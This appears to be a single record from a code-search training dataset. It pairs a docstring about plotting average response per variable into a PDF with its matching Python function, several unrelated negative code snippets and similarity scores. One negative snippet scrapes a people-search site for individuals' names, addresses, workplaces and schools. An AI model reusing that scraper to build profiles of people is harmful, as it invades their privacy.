objects\n \"objects\": tfds.features.Sequence(\n {\n \"id\": tf.int64,\n \"image_id\": tf.int64,\n \"area\": tf.int64, # un-normalized area\n \"boxes\": tfds.features.BBoxFeature(), # normalized bounding box [ymin, xmin, ymax, xmax]\n \"labels\": tfds.features.ClassLabel(num_classes=5),\n \"is_crowd\": tf.bool,\n }\n ),\n # these data only apply to the \"green screen patch\" objects, which both modalities share\n \"patch_metadata\": tfds.features.FeaturesDict(\n {\n \"gs_coords\": tfds.features.Sequence(\n tfds.features.Tensor(\n shape=[2], dtype=tf.int64\n ), # green screen vertices in (x,y)\n length=4, # always rectangle shape\n ),\n \"cc_ground_truth\": tfds.features.Tensor(\n shape=[24, 3], dtype=tf.float32\n ), # colorchecker color ground truth\n \"cc_scene\": tfds.features.Tensor(\n shape=[24, 3], dtype=tf.float32\n ), # colorchecker colors in a scene\n # binarized segmentation mask of patch.\n # mask[x,y] == 1 indicates patch pixel; 0 otherwise\n \"mask\": tfds.features.Tensor(shape=[600, 800, 3], dtype=tf.uint8),\n \"shape\": tfds.features.Text(),\n }\n ),\n }\n\n return tfds.core.DatasetInfo(\n builder=self,\n description=_DESCRIPTION,\n features=tfds.features.FeaturesDict(features),\n citation=_CITATION,\n )", "def names():\n\n df = pd.read_sql_query(f\"SELECT * FROM olympics_raw\", con = engine)\n print(df.head())\n \n\n # return jsonify(all_olympians)\n return jsonify(df.to_dict(orient='records'))", "def getprojects(self):\n resp = self.conn.request('GET', self.URLS['allprojects'], dict(api_key=self.api_key))\n data = resp.data.decode('utf-8')\n jdata = json.loads(data)['projects']\n # Convert nested JSON documents\n for project_index in range(len(jdata)):\n for field in ('options_json', 'templates_json'):\n 
jdata[project_index][field] = json.loads(jdata[project_index][field])\n # Pass project details dictionaries to constructors, return array\n return [PhProject(self, project) for project in jdata]", "def get_data(self):\n def _clean_search_hit(search_hit):\n \"\"\"\n Takes in a search result hit as a BeautifySoup tag and pulls out all the data to match the desired schema.\n\n :param search_hit:\n :return Dictionary: A dictionary with the cleaned data\n \"\"\"\n\n hit_name = search_hit.find(class_='hit-name')\n hit_url = hit_name.get('href')\n hit_id = hit_url.split('/')[-1]\n name = hit_name.get_text().split(',')[0].title().split()\n\n current_city = search_hit.find(class_='hit-location').get_text().upper()\n\n # Find all Addresses for search result.\n try:\n address = search_hit.find(class_='hit-pastAddresses').find_all(class_='hit-values')\n address = list({a.text.upper().replace('.', '') for a in address})\n except AttributeError:\n address = list()\n\n # find the address that is most likely the current main address.\n try:\n address.insert(0, address.pop(address.index(current_city)))\n except ValueError:\n address.insert(0, current_city)\n\n address = [\n {\n '@type': 'PostalAddress',\n 'addressLocality': locality.title(),\n 'addressRegion': region\n } for locality, region in [a.split(', ') for a in address]]\n\n work_location = {'@type': 'Place'}\n try:\n work_location['name'] = search_hit\\\n .find(class_='hit-work')\\\n .find(class_='hit-values')\\\n .get_text()\\\n .title()\n except AttributeError:\n work_location['name'] = ''\n\n alumni_of = {'@type': 'EducationalOrganization'}\n try:\n alumni_of['name'] = search_hit\\\n .find(class_='hit-high-school')\\\n .find(class_='hit-values')\\\n .get_text().title()\n except AttributeError:\n pass\n\n return {\n '@id': hit_id,\n '@type': 'Person',\n 'name': ' '.join(name),\n 'givenName': name[0],\n 'middleName': ' '.join(name[1:-1]),\n 'familyName': name[-1],\n 'url': hit_url,\n 'address': address,\n 'workLocation': work_location,\n 'alumniOf': alumni_of,\n }\n\n def _refine_search(search_str, options):\n \"\"\"\n Takes a list of WebElements and a search string, looks for string in the text of each WebElement, and\n press the option if found. Returns Boolean for found status\n\n :param search_str: str of the desired option.\n :param options: list of WebElements from Beautify Soup that represents all of the available options.\n :return:\n \"\"\"\n search_str = search_str.upper()\n logging.info(f'Looking for \\'{search_str}\\'')\n try:\n for option in options:\n option_text = option.text.upper()\n logging.info(f'Option Checked: {option_text}')\n if search_str in option_text:\n option.click()\n time.sleep(2)\n logging.info(f'Option Selected: {option_text}')\n return True\n else:\n return False\n except AttributeError:\n return True\n except StaleElementReferenceException as e:\n ChromeCrash(e)\n\n with self.driver(executable_path=self.DRIVER_DIR) as driver:\n driver.get(self.url)\n\n \"\"\"\n The CSS for the page doesn't show the State nor the City selector options if the page is too narrow,\n so we need to make sure the browser is open wide enough for the CSS to make those options visible. 
\n \"\"\"\n driver.fullscreen_window()\n\n # Refine the search by State\n address_region = self.person.get('addressRegion', '')\n address_region = STATES.get(address_region.upper(), address_region.upper())\n region_options = driver\\\n .find_element_by_class_name(\"STATE\")\\\n .find_elements_by_class_name(\"refinementList-text\")\n\n if not _refine_search(address_region, region_options):\n return False\n\n # Narrow the search by pressing a City option\n address_locality = self.person.get('addressLocality').title()\n locality_options = driver\\\n .find_element_by_class_name(\"CITY\")\\\n .find_elements_by_class_name(\"refinementList-text\")\n\n if not _refine_search(address_locality, locality_options):\n return False\n\n \"\"\"\n The Page Loads dynamically, so we need to scroll down the page to show all the search results. It needs to\n be done in steps with a pause between movements to allow for loading. \n Here it will first get the current location on the page, attempt to move down the page, and then check to\n see if the location changed.\n \"\"\"\n\n if self.auto_scroll and len(driver.find_elements_by_class_name(\"ais-InfiniteHits-item\")) > 15:\n current_height, new_height = 0, driver.execute_script(\"return document.body.scrollHeight\")\n\n while new_height != current_height:\n # Scroll down to the bottom of the page\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\n # Wait to load page\n time.sleep(SCROLL_PAUSE_TIME)\n\n # Calculate new scroll height and compare with last scroll height\n current_height, new_height = new_height, driver.execute_script(\"return document.body.scrollHeight\")\n\n page_source = driver.page_source\n page_soup = bs(page_source, 'html.parser')\n search_results = list(page_soup.find_all(class_='ais-InfiniteHits-item'))\n for i, search_result in enumerate(search_results):\n search_results[i] = _clean_search_hit(search_result)\n\n self.data_from_website = pd.DataFrame(search_results)\n self.data_from_website.set_index('@id', inplace=True)\n return True", "def glass_pandas(self):\n # pandas.set_option('display.width', 120)\n # TODO timeit (git_implementation) vs (my_implementation)\n # * df = pd.DataFrame(json.loads(r.text))\n # * df = df.set_index('t')\n # * df.index = pd.to_datetime(df.index, unit='s')\n # * df = df.sort_index()\n # * s = df.v\n # * s.name = '_'.join(url.split('/')[-2:])\n # * return s\n # for elem in self.loaded:\n # _metric, _data = elem[1]['_metrics'], elem[1]['_data']\n # try:\n # frame_keys = ['t'] + list(_data[0]['o'].keys())\n # framed = pandas.DataFrame(\n # data=[{k: (_data[iters]['t'] if k in 't' else _data[iters]['o'][k])\n # for k in frame_keys} for iters in range(len(_data))],\n # columns=frame_keys)\n # except KeyError:\n # framed = pandas.DataFrame(_data)\n # framed.set_index('t', inplace=True)\n # framed.index = pandas.to_datetime(\n # framed.index.to_flat_index(), unit='s', infer_datetime_format=True)\n # framed.sort_index(inplace=True)\n # framed.name = _metric\n # print(framed.name)\n # print(framed)", "def get_info_from_row(r):\n cells = r.select(\"td\") \n # we want this data point if theres a zip, save all the info\n # including lat, long, type, \n if len(cells) > 10 and cells[2].select(\"a\"):\n id_ = re.sub(\"[^\\w\\. 
]\", \"\",cells[0].text)\n data_anchor = cells[2].select(\"a\")[0]\n href = data_anchor[\"href\"]\n desc = cells[3].text\n type_ = cells[4].text\n med_ec = cells[8].text\n flow = re.sub(\"[^\\w\\.]\", \"\",cells[9].text)\n lat = re.sub(\"[^\\w\\.]\", \"\",cells[10].text)\n lon = re.sub(\"[^\\w\\.]\", \"\",cells[11].text)\n \n return {\"id\":id_, \"desc\":desc, \"type\":type_, \"med_ec\":med_ec, \"flow\":flow, \"lat\":lat, \"lon\":lon, \"href\":href}" ]
[ "0.58241713", "0.57872564", "0.5712627", "0.5473365", "0.5464034", "0.5438289", "0.54039174", "0.53523386", "0.5309826", "0.5266796", "0.5227246", "0.5216134", "0.51905394", "0.5185898", "0.51729375", "0.5161594", "0.5143175", "0.5138437", "0.5124035", "0.51153386", "0.5106635", "0.50948983", "0.50927824", "0.5091926", "0.5083201", "0.5079717", "0.5075052", "0.5072244", "0.50654215", "0.5063841", "0.50576365", "0.5042167", "0.5040933", "0.50373906", "0.503705", "0.50113255", "0.50070816", "0.49856043", "0.4983203", "0.49799192", "0.49774805", "0.4973956", "0.49721754", "0.49721128", "0.49691868", "0.49553695", "0.49522576", "0.49443406", "0.49419528", "0.4935744", "0.49345595", "0.49308005", "0.49210006", "0.4917369", "0.49171233", "0.49121323", "0.4904817", "0.48938093", "0.48916945", "0.488792", "0.48875734", "0.48809645", "0.48737332", "0.4873445", "0.48659647", "0.48619986", "0.48603666", "0.48582882", "0.4856893", "0.48565707", "0.4856216", "0.48549998", "0.48486587", "0.4848305", "0.48401514", "0.48368624", "0.48360723", "0.4834831", "0.48332337", "0.48314106", "0.48296654", "0.48280975", "0.4827655", "0.48218325", "0.4817879", "0.48126706", "0.48084152", "0.48048773", "0.48045903", "0.48041013", "0.48031673", "0.4799518", "0.47983", "0.4796307", "0.4795676", "0.4795338", "0.4789771", "0.47863775", "0.4785633", "0.47847873" ]
0.5347947
8
Plot average response for all variables in the dataset and save the plot in a pdf. dataset: pandas dataset; prj_info: dictionary containing project information (response...)
def plot_average_reponse(data, prj_info, pp=PdfPages("exploration.pdf"), TMP=1234, bins=20):
    #Copy data
    data = data.copy()
    #Slice data
    data = data.sample(n=min(10000, data.shape[0]), random_state=1234)
    #Colnames
    var_to_plot = list(set(data.columns.values) - set(prj_info['PRJ_COLUMN'].values()))
    #Loop figure
    pbar = ProgressBar()
    for var in pbar(var_to_plot):
        #Bins
        if data[var].dtype.name != "category" and len(data[var].unique()) > bins:
            data["var_new"] = pd.qcut(data[var], bins, duplicates='drop')
        else:
            data["var_new"] = data[var].astype(str)
        #Table
        data_plot = data.groupby("var_new").agg({prj_info['PRJ_COLUMN']["RESPONSE"]: 'mean', "var_new": 'count'})
        #Build plot
        f, ax = plt.subplots()
        ax2 = ax.twinx()
        sns.barplot(x=data_plot.index.tolist(), y="var_new", data=data_plot, ax=ax, color="dodgerblue")
        sns.pointplot(x=data_plot.index.tolist(), y=prj_info['PRJ_COLUMN']["RESPONSE"], data=data_plot, ax=ax2, color="chartreuse")
        ax.set_xlabel(var)
        ax.set_ylabel(var)
        ax2.set_ylabel(prj_info['PRJ_COLUMN']["RESPONSE"])
        plt.title("Average response by " + var)
        plt.setp(ax.xaxis.get_majorticklabels(), rotation=60)
        pp.savefig(f)
    return None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def avg_response_report(df, var_list, y_obs, y_est, file):\n page = PdfPages(file)\n for var in var_list:\n avg_response(df, var, y_obs, y_est, show=False)\n page.savefig()\n page.close()", "def explore_data(data,prj_info,TMP=1234):\r\n print(\" Data file rows and columns are : \", data.shape)\r\n #Open pdf\r\n pp = PdfPages(prj_info['OUTPUT_PATH'] + \"exploration_\" + str(TMP) + \".pdf\")\r\n\r\n #Plot average\r\n plot_average_reponse(data,prj_info,pp,TMP)\r\n\r\n #Close pdf\r\n pp.close()\r\n return None", "def do_plot(self):\n years = sorted(set(self.prediction_df_without_covid19['Year']))\n predict_without_covid_country = self.prediction_df_without_covid19[\n self.prediction_df_without_covid19['Country'].isin([self.country])].sort_values(['Year'],\n ascending=[True])\n predict_with_covid_country = self.prediction_df_with_covid19[\n self.prediction_df_with_covid19['Country'].isin([self.country])].sort_values(['Year'],\n ascending=[True])\n # ------------------------------------------------------------------------------------------------------\n pa = \\\n predict_without_covid_country.loc[predict_without_covid_country['Year'] == 1990][\n 'Total_CO2_Emissions'].values[\n 0]\n x = []\n for i in range(len(years)):\n x.append(pa * 0.6)\n # ------------------------------------------------------------------------------------------------------\n fig = Figure()\n ax = fig.subplots()\n ax.grid(True, alpha=0.3)\n # plot_title = 'Total CO2 Emissions predicted from 2019-2030 for ' + self.country\n plot_title = 'Total ' + '$CO_2$' + ' Emissions predicted from 2019-2030 for ' + self.country\n label_country_without_covid = 'Total CO2 emissions without covid'\n label_country_with_covid = 'Total CO2 emissions with Covid-19'\n # ------------------------------------------------------------------------------------------------------\n params = {'mathtext.default': 'regular'}\n rcParams.update(params)\n rcParams['font.size'] = 7\n rcParams['lines.markersize'] = 4\n rcParams['figure.figsize'] = [7, 4]\n rcParams['figure.dpi'] = 150\n rcParams['font.family'] = 'Verdana'\n rcParams[\"font.weight\"] = \"normal\"\n font = {'family': 'Verdana',\n 'color': 'xkcd:darkgreen',\n 'weight': 'normal',\n 'size': 9,\n }\n colors = rcParams['axes.prop_cycle'].by_key()['color']\n l1, = ax.plot(years, predict_without_covid_country['Total_CO2_Emissions'], color='xkcd:dark blue green',\n marker='o',\n label=label_country_without_covid)\n l2, = ax.plot(years, predict_with_covid_country['Total_CO2_Emissions'], color='xkcd:neon pink', marker='.',\n label=label_country_with_covid)\n l3, = ax.plot(years, x, color='xkcd:orchid', marker='1')\n print('without covid: ', predict_without_covid_country['Total_CO2_Emissions'].values)\n print('with covid: ', predict_with_covid_country['Total_CO2_Emissions'].values)\n ax.set_xlabel('Years', fontdict=font)\n ax.set_ylabel('Emissions (Gg)', fontdict=font)\n ax.set_title(plot_title, fontsize=12, fontweight='normal')\n ax.patch.set_facecolor('xkcd:green')\n ax.set_facecolor('xkcd:pale green')\n fig.legend((l1, l2, l3), ('Prediction without Covid19', 'Prediction with Covid19', 'Paris Agreement'),\n bbox_to_anchor=(0.907, 0.89))\n fig.savefig(OUTPUT_GRAPH_PATH)", "def data_visualization(df):\r\n\r\n # Visualizing the target variable\r\n plt.figure(figsize=(14, 10))\r\n plt.title(\"Count of bike sharing according to dates\")\r\n plt.plot(df['dteday'], df['cnt'])\r\n #plt.show()\r\n plt.savefig(\"Raw data visualization.png\")\r\n\r\n # box plot for visualizing outliers\r\n fig=px.box(df, y=\"cnt\", 
notched=True,title='Box plot of the count variable')\r\n #fig.show()\r\n plt.savefig(\"Box Plot.png\")\r\n\r\n # point plot for hourly utilization\r\n for column in ['season', 'yr', 'mnth', 'holiday', 'weekday', 'workingday', 'weathersit']:\r\n hist = px.histogram(df, x=column, y='cnt')\r\n hist.show()\r\n plt.savefig(\"Histogram plots for each column.png\")\r\n sns.pointplot(x=df['hr'], y='cnt', data=df);\r\n plt.title(\"Hourly Utilization\")\r\n plt.ylabel(\"Bike Shares\", fontsize=12)\r\n plt.xlabel(\"Hour\", fontsize=12)\r\n plt.savefig(\"Hourly Utilization point plot.png\", dpi=300, bbox_inches='tight')\r\n\r\n # line plot for hourly utilization\r\n for c in ['holiday','season','workingday']:\r\n sns.lineplot(data=df,x='hr',y='cnt',hue=c)\r\n plt.title('Hourly plot vs count')\r\n plt.savefig(\"Hour vs count plot_main features.png\",dpi=300, bbox_inches='tight')\r\n\r\n # point plots for humidity vs count\r\n sns.pointplot(x='hum', y='cnt', data=df)\r\n plt.title(\"Amount of bike shares vs humidity\", fontsize=25)\r\n plt.xlabel(\"Humidity (%)\", fontsize=20)\r\n plt.ylabel('count of bike shares', fontsize=20)\r\n plt.locator_params(axis='x', nbins=10)\r\n plt.savefig(\"Pointplot of humidity vs count.png\",dpi=300, bbox_inches='tight')\r\n\r\n # box plots of whole df\r\n bx=px.box(df, y=\"cnt\")\r\n bx.show()\r\n\r\n # feature correlation plot\r\n corrs = abs(df.corr())\r\n sns.heatmap(corrs, annot=True)\r\n plt.title(\"Feature Correlation\")\r\n plt.savefig(\"Feature_correlation.png\", dpi=300, bbox_inches='tight')\r\n return plt", "def plot_data(data, par, par_names, par_fixed, output_dir='./'):\n\n datasets = dict()\n\n for data_point in data:\n experiment_name = data_point.par['experiment_name']\n datasets.setdefault(experiment_name, list()).append(data_point)\n\n for experiment_name, dataset in datasets.items():\n\n # ##### Matplotlib ######\n\n name_pdf = ''.join([experiment_name, '.pdf'])\n name_pdf = os.path.join(output_dir, name_pdf)\n\n name_txt = ''.join([experiment_name, '.fit'])\n name_txt = os.path.join(output_dir, name_txt)\n\n print(\" * {} [.fit]\".format(name_pdf))\n\n # #######################\n\n data_grouped = group_data(dataset)\n profiles, r2_min, r2_max = compute_profiles(data_grouped)\n ymin, ymax = set_lim([r2_min, r2_max], 0.10)\n\n with PdfPages(name_pdf) as file_pdf, open(name_txt, 'w') as file_txt:\n\n for (_index, id_), profile in sorted(profiles.items()):\n write_profile(id_, profile, file_txt)\n\n ###### Matplotlib ######\n\n fig = plt.figure(1, frameon=True)\n ax = fig.add_subplot(111)\n\n ax.axhline(0, color='black', alpha=0.87)\n\n ########################\n\n frq, r2_cal, r2_exp, r2_erd, r2_eru = profile[0]\n\n ax.plot(\n frq,\n r2_cal,\n linestyle='-',\n color=red200,\n zorder=2,\n )\n\n ax.errorbar(\n frq,\n r2_exp,\n yerr=[r2_erd, r2_eru],\n fmt='o',\n color=red500,\n zorder=3,\n )\n\n xmin, xmax = set_lim(frq, 0.10)\n\n ax.set_xlim(xmin, xmax)\n ax.set_ylim(ymin, ymax)\n\n ax.xaxis.set_major_locator(MaxNLocator(6))\n ax.yaxis.set_major_locator(MaxNLocator(6))\n\n ax.set_xlabel(r'$\\mathregular{\\nu_{CPMG} \\ (Hz)}$')\n ax.set_ylabel(\n r'$\\mathregular{R_{2,eff} \\ (s^{-1})}$')\n\n ax.set_title('{:s}'.format(id_.upper()))\n\n fig.tight_layout()\n\n ########################\n\n file_pdf.savefig()\n plt.close()\n\n ########################\n\n return", "def _plot_marginal_pdfs( res, nbins=101, **kwargs):\n\tfrom matplotlib import pyplot as pl\n\timport numpy as np\n\n\tnparam = len(res.vparam_names)\n\t# nrow = np.sqrt( nparam )\n\t# ncol = nparam 
/ nrow + 1\n\tnrow, ncol = 1, nparam\n\n\tpdfdict = _get_marginal_pdfs( res, nbins )\n\n\tfig = plt.gcf()\n\tfor parname in res.vparam_names :\n\t\tiax = res.vparam_names.index( parname )+1\n\t\tax = fig.add_subplot( nrow, ncol, iax )\n\n\t\tparval, pdf, mean, std = pdfdict[parname]\n\t\tax.plot( parval, pdf, **kwargs )\n\t\tif np.abs(std)>=0.1:\n\t\t\tax.text( 0.95, 0.95, '%s %.1f +- %.1f'%( parname, np.round(mean,1), np.round(std,1)),\n\t\t\t\t\t ha='right',va='top',transform=ax.transAxes )\n\t\telif np.abs(std)>=0.01:\n\t\t\tax.text( 0.95, 0.95, '%s %.2f +- %.2f'%( parname, np.round(mean,2), np.round(std,2)),\n\t\t\t\t\t ha='right',va='top',transform=ax.transAxes )\n\t\telif np.abs(std)>=0.001:\n\t\t\tax.text( 0.95, 0.95, '%s %.3f +- %.3f'%( parname, np.round(mean,3), np.round(std,3)),\n\t\t\t\t\t ha='right',va='top',transform=ax.transAxes )\n\t\telse :\n\t\t\tax.text( 0.95, 0.95, '%s %.3e +- %.3e'%( parname, mean, std),\n\t\t\t\t\t ha='right',va='top',transform=ax.transAxes )\n\n\tplt.draw()", "def plot(self):\n # get data without totals\n data = self.woe_report[self.woe_report.index != 'total']\n # setup panel\n fig, axs = plt.subplots(1, 3, figsize=(12, 3))\n plt.subplots_adjust(wspace=0.3)\n # first chart\n data['P(Hi|A)'].plot(ax=axs[0], linewidth=3, alpha=0.7)\n data['P(Hi|Ā)'].plot(ax=axs[0], linewidth=3, alpha=0.7)\n axs[0].set_title('Probability distribution')\n axs[0].set_xlabel(data.index.name)\n axs[0].set_ylabel('probability')\n axs[0].legend(['P(Hi|A)', 'P(Hi|Ā)'])\n # second chart\n data['weight-of-evidence'].plot(ax=axs[1], linewidth=3, alpha=0.7)\n axs[1].set_title('WoE')\n axs[1].set_xlabel(data.index.name)\n axs[1].set_ylabel('WoE')\n # third chart\n data['information-value'].plot(ax=axs[2], linewidth=3, alpha=0.7)\n axs[2].set_title('Information value')\n axs[2].set_ylabel('IV')", "def plot_individual(xdict, ydict, xprop, yprop, documents, spline):\n figure_array = {}\n for item in documents:\n xlabel = \"\\\\textbf{\" + label_dict[xprop] + \"}\"\n ylabel = \"\\\\textbf{\" + label_dict[yprop] + \"}\"\n x = xdict[item[\"path_id\"]]\n y = ydict[item[\"path_id\"]]\n # fig_title = item[\"path_id\"] + \"(\" + item[\"pretty_formula\"] + \")\" # Individual traces\n # fig_title = yprop + item[\"cation_type\"] # Plot by cation\n fig_title = yprop # All together\n figure_array[item[\"path_id\"]] = plt.figure(fig_title, figsize=(6,6), dpi=plotting_dpi)\n ax = figure_array[item[\"path_id\"]].add_subplot(111) \n ax.scatter(x,y, s=70, zorder=2, color=color_dict[item[\"cation_type\"]], linewidths=2.5, edgecolors='black')\n if spline:\n tck = interpolate.splrep(x, y, s=0)\n xnew = np.arange(0, 100, 0.1)\n splfit = interpolate.splev(xnew, tck, der=0)\n x = xnew\n y = splfit\n if item[\"path_id\"][-3:] == \"002\":\n ax.plot(x,y, linewidth=2.5, zorder=1, color=color_dict[item[\"cation_type\"]], linestyle='dashed')\n elif item[\"path_id\"][-3:] == \"003\":\n ax.plot(x,y, linewidth=2.5, zorder=1, color=color_dict[item[\"cation_type\"]], linestyle='dotted')\n else:\n ax.plot(x,y, linewidth=2.5, zorder=1, color=color_dict[item[\"cation_type\"]])\n ax.set_xlabel(xlabel, fontsize=24)\n # ax.set_ylim([0,1200])\n # ax.set_xlim([0,100])\n ax.set_ylabel(ylabel, fontsize=24)\n ax.tick_params(axis='x', labelsize=22)\n ax.tick_params(axis='y', labelsize=22)\n border_width = 2\n [i.set_linewidth(border_width) for i in ax.spines.itervalues()]\n plt.tight_layout()\n plt.legend(loc='best', prop={'size': 14})\n plt.rc('text', usetex=True)\n plt.rc('font', family='sans-serif')\n plt.tight_layout()\n 
plt.show()", "def three_PDF_plots(res=200,table_exts=[''],**kwargs):\n\n p = copy.copy(params)\n for key,val in kwargs.items():\n setattr(p,key,val)\n GR = glo.global_results()\n\n fig, axs = plt.subplots(3, sharex='col',\\\n figsize=(8,15),facecolor='w',\\\n gridspec_kw={'hspace': 0, 'wspace': 0})\n\n # First print cell data distribution\n i = 0\n for gal_index in zip(p.gal_index):\n ax1 = axs[i]\n gal_ob = gal.galaxy(GR=GR, gal_index=gal_index)\n df = gal_ob.cell_data.get_dataframe()\n lognH = np.log10(df.nH)\n hist = np.histogram(lognH[df.nH.values > 0],bins=200,weights=df.m[df.nH.values > 0])\n hist1 = np.asarray(hist[0]) # histogram\n hist2 = np.asarray(hist[1]) # bin edges\n hist1 = hist1*1./sum(hist1)\n ax1.plot(hist2[0:len(hist1)],hist1,drawstyle='steps',ls='-',lw=1.5,\\\n alpha=0.7,color=p.color[0],label='Original cell distribution')\n \n for table_ext,ls,color in zip(table_exts,['--',':'],p.color[1::]):\n if '_M10' in table_ext: lab = 'Mach = 10'\n if '_arepoPDF_M51' in table_ext: lab = 'AREPO parametrized PDF'\n PDF(gal_index,color=color,table_ext=table_ext,ls=ls,res=200,add=True,ax=ax1,label=lab,ow=p.ow)\n \n if i == 0: ax1.legend(loc='upper right',fontsize=12)\n if i == 2: ax1.set_xlabel(getlabel('lnH'))\n ax1.set_ylabel('Mass fraction per bin')\n\n i += 1\n\n if p.savefig:\n if not os.path.isdir(p.d_plot + 'cell_data/PDFs/'): os.mkdir(p.d_plot + 'cell_data/PDFs/') \n plt.savefig(p.d_plot + 'cell_data/PDFs/simple_PDF_%s%s%s_x3.png' % (p.sim_name,p.sim_run,p.table_ext), format='png', dpi=250, facecolor='w')", "def plot_data(self):", "def plot(self):\n # Get data\n #print(self.file_name)\n fig, ax = plb.subplots(1,1,figsize=(18,20))\n for key,value in self.testTrend.items():\n x = np.arange(len(self.data_array))\n y = np.asarray(value)\n plb.plot(x,y, label=key)\n ax.scatter(x, y)\n for i in range(0, len(value)):\n ax.annotate(str(i), (x[i], y[i]))\n # Title\n plb.title(self.file_name)\n # Legend\n plb.legend(bbox_to_anchor=(.05, 1), loc='best', borderaxespad=0.)\n # x ticks\n plb.xticks(np.arange(min(x), max(x) + 1, 2.0))\n #plb.ylim(-250, 1)\n # Show image\n plb.show()", "def resultPlots(record):\n record.createDataFrames()\n \n atmPlot(record)\n clientPlot(record)\n transactionPlot(record)", "def analysis_plot(predictions, ys):\n fig, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(20, 5))\n\n residuals = ys - predictions\n\n # Plot 1 - Predicted vs Actual\n sns.scatterplot(predictions, ys, ax=ax1)\n ax1.set_title('Predicted vs Actual', fontsize=20)\n ax1.set(xlabel='Predicted Ys', ylabel='Actual Ys')\n\n # Plot 2 - Residuals PLot (predicted vs residuals)\n sns.scatterplot(predictions, residuals, ax=ax2)\n ax2.set_title('Residuals Plot', fontsize=20)\n ax2.set(xlabel='Predicted Ys', ylabel='Residuals')\n\n # Plot 3 - QQ Plot\n sm.qqplot(residuals, ax=ax3, line='s')\n ax3.set_title('QQ Plot- Distribution of Residuals', fontsize=20)\n\n plt.show();", "def plot_parameter_evolution(analyses, pdf=False):\n ncs = np.arange(11, 15)\n genes = set(analyses.gene)\n constructs = set(analyses.construct)\n long_labels = {'bac': 'bac', 'no_pr': 'no pr', 'no_sh': 'no sh'}\n gene_long = {'hb': 'hunchback', 'kn': 'knirps', 'sn': 'snail'}\n y_label = {'j': 'Normalized flux $j$',\n 'rho': 'Site occupation density $\\\\rho$', 'tau': 'Residence time $\\\\tau$ (s)', 'alpha_comb': 'Initiation rate $\\\\alpha$ (pol/min)'}\n\n # Add extra jiggle to be able to distinguish overlapping data points\n x_jiggle = 0.04\n x_shifts = np.array([-1, 0, 1]) * x_jiggle\n\n # Plot parameters\n capsize = 0\n 
markersize = 4\n lw = 1 # line width\n\n for gene in genes:\n grouped_data = analyses.groupby(by=['gene', 'construct', 'nc'])\n all_means = grouped_data.mean()\n all_stds = grouped_data.std(ddof=1)\n all_ps = analyses.groupby(by=['gene', 'nc']).first()\n\n for quantity in ['j', 'rho', 'tau', 'alpha_comb']:\n ymaxs = {'j': 0.36, 'rho': 0.27, 'tau': 103, 'alpha_comb': 12}\n num = 12\n set_figure_size(num=num, rows=1, page_width_frac=0.5, clear=True, height_factor=0.7)\n fig, ax = plt.subplots(1, 1, num=num, clear=True)\n avg_data, std_data = {}, {}\n for construct in constructs:\n if quantity in ['rho', 'j']:\n avg_data[construct] = all_means.loc[(\n gene, construct, slice(None)), quantity].values\n std_data[construct] = all_stds.loc[(\n gene, construct, slice(None)), quantity].values\n\n elif quantity in ['tau', 'alpha_comb']:\n avg_data[construct] = all_means.loc[(\n gene, construct, slice(None)), quantity].values\n std_data[construct] = np.sqrt(\n all_means.loc[(gene, construct, slice(None)), quantity + 'V'].values)\n\n # Prepare a marker generator and plot the data with errorbars\n marker_gen = itertools.cycle(markers_additivity)\n for i, construct in enumerate(constructs):\n m = next(marker_gen)\n plt.errorbar(\n ncs + x_shifts[i], avg_data[construct],\n yerr=std_data[construct],\n fmt='-' + m, color=colors_additivity[construct],\n capsize=capsize, label=long_labels[construct],\n markersize=markersize, lw=lw)\n\n # Adjust plot\n plt.xlabel('Nuclear cycle')\n plt.ylabel(y_label[quantity])\n plt.ylim(ymin=0, ymax=ymaxs[quantity])\n\n plt.xticks(ncs)\n plt.title(gene_long[gene])\n\n plt.tight_layout()\n plt.show()\n\n # Save figure\n figname = 'additivity_' + quantity + '_' + gene\n figpath = os.path.join(figures_folder, figname)\n fig.savefig(figpath + '.png', pad_inches=0, bbox_inches='tight')\n if pdf:\n fig.savefig(figpath + '.pdf', pad_inches=0, bbox_inches='tight')", "def Diagnostic_plot3(self):\n\n floc = glob.glob('/home/mxs191/Desktop/MathewSchofield/TRG/DetTest/DetTest1_results/Info2Save/*.csv')\n fig = plt.figure()\n plt.rc('font', size=18)\n #fig, ax = generalPlot(xaxis=r'$\\nu / \\mu$Hz', yaxis=r'$P_{\\rm det}$')\n gs = gridspec.GridSpec(1, 2, width_ratios=(4,1))\n ax = fig.add_subplot(gs[0])\n\n for idx, i in enumerate(floc):\n\n d = pd.read_csv(i)\n\n if idx == 0:\n fullpdet = d[['f0', 'Pdet_Kepler', 'Pdet_TESS365', 'Pdet_TESS27']]\n else:\n fullpdet = pd.concat([ fullpdet,\\\n d[['f0', 'Pdet_Kepler', 'Pdet_TESS365', 'Pdet_TESS27']] ])\n\n plt.scatter(d['f0'], d['Pdet_Kepler'], color='b',\\\n label=r\"$\\rm Kepler - 4\\ yrs$\" if idx == 0 else '')\n plt.scatter(d['f0'], d['Pdet_TESS365'], color='orange',\\\n label=r'$\\rm TESS - 1\\ yr$' if idx == 0 else '')\n plt.scatter(d['f0'], d['Pdet_TESS27'], color='g',\\\n label=r'$\\rm TESS - 27\\ days$' if idx == 0 else '')\n\n plt.axhline(fullpdet['Pdet_Kepler'].median(), color='b')\n plt.axhline(fullpdet['Pdet_TESS365'].median(), color='orange')\n plt.axhline(fullpdet['Pdet_TESS27'].median(), color='g')\n ax.legend(loc='lower right')\n plt.ylim([0,1])\n ax.set_ylabel(r'$P_{\\rm det}$')\n ax.set_xlabel(r'$\\nu / \\mu \\rm Hz$')\n\n bx = fig.add_subplot(gs[1])\n import seaborn as sns\n bw = 0.4\n sns.kdeplot(fullpdet['Pdet_Kepler'].values, shade=True, vertical=True, \\\n ax=bx, color='b', bw=bw)\n sns.kdeplot(fullpdet['Pdet_TESS365'].values, shade=True, vertical=True, \\\n ax=bx, color='orange', bw=bw)\n sns.kdeplot(fullpdet['Pdet_TESS27'].values, shade=True, vertical=True, \\\n ax=bx, color='g', bw=bw)\n bx.set_ylim([0.0,1.0])\n 
